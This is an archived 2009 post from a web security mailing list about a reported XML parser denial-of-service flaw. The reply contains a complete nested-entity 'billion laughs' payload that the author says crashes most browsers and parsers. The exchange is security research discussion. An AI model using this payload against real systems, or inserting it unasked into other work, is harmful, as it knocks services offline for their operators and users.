[WEB SECURITY] Multi Vendor XML parser DOS Details?

Achim Hoffmann ah at securenet.de
Fri Aug 7 04:03:45 EDT 2009


robert at webappsec.org wrote on 06.08.2009 20:36:
> There's been news about a new XML Parser Denial of Service that seems to affect multiple products.
> Unfortunately I haven't seen any technical details as to what the issue is, does anyone
> know what it is exactly?
> 
> I'm thinking one of the following?
> 
> XML Attribute Blowup (WASC TCv2)
> http://projects.webappsec.org/XML-Attribute-Blowup
> 
> XML Entity Expansion (WASC TCv2)
> http://projects.webappsec.org/XML-Entity-Expansion

Hi Robert,

my example (see below) crashes most browsers and probably also most XML
parsers (SAX, Xerces, etc.). For the parsers, please someone out there
to test which one is affected (as I don't have a proper test environment).

Achim
--


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE bang [
<!ENTITY x0 "Hare Krishna">
<!ENTITY x1 "&x0;&x0;&x0;">
<!ENTITY x2 "&x1;&x1;&x1;">
<!ENTITY x3 "&x2;&x2;&x2;">
<!ENTITY x4 "&x3;&x3;&x3;">
<!ENTITY x5 "&x4;&x4;&x4;">
<!ENTITY x6 "&x5;&x5;&x5;">
<!ENTITY x7 "&x6;&x6;&x6;">
<!ENTITY x8 "&x7;&x7;&x7;">
<!ENTITY x9 "&x8;&x8;&x8;">
<!ENTITY x10 "&x9;&x9;&x9;">
<!ENTITY x11 "&x10;&x10;&x10;">
<!ENTITY x12 "&x11;&x11;&x11;">
<!ENTITY x13 "&x12;&x12;&x12;">
<!ENTITY x14 "&x13;&x13;&x13;">
<!ENTITY x15 "&x14;&x14;&x14;">
<!ENTITY x16 "&x15;&x15;&x15;">
<!ENTITY x17 "&x16;&x16;&x16;">
<!ENTITY x18 "&x17;&x17;&x17;">
<!ENTITY x19 "&x18;&x18;&x18;">
]>
<bang>&x19;</bang>


----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA



More information about the websecurity mailing list